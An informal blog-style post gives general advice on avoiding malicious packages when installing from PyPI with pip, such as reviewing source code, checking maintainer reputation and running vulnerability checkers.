Security when installing Python packages
What to keep in mind when installing packages with pip
You should always think about security. Especially when you’re writing code. And twice as much when you use other people’s code. It saves a lot of time and effort. But it can also lead to problems, especially if you don’t at least use common sense.
When programming, you can save commonly used classes, objects, and functions in modules. This is the official name for files with the extension .py. Conventionally, a module can be distinguished from an ordinary Python program by the fact that the program is designed to run and execute, while the module is designed to store frequently used constructs and import them into other programs.
A Package in Python is a directory containing other directories and modules, as well as special files. Packages are used to form a namespace, which allows different modules, united as a rule by a common theme, to be used.
The best known repository for such packages is the PyPI or Python Package Index. You can find and install packages on almost any topic in PyPI. In 2022, there were over 370,000 different packages contained there.
I was wondering what security measures other developers are taking to make sure they aren’t downloading anything malicious from PyPI. After all, anyone can upload their package there, and so far there are no security checks or preventive measures taken by PyPi itself.
Some helpful tips on this topic:
- If you can understand it, take a look at the source code of a package before you install it.
- Only install software from reputable developers. On the package page, at least look at the GitHub stats - the number of stars and forks. The more there are, the more people using the package and the less likely to get evil code.
- Read Python Security doc about packages and PyPi.
- Pay attention to the Safety package. It checks your installed packages for known vulnerabilities.
- Use the Insecure Python Packages list to identify vulnerabilities in installed packages.
Among the features they plan to add will be verifiable cryptographic artifact signing and automatic detection of malicious downloads.
Let your code and your modules be always safe! :)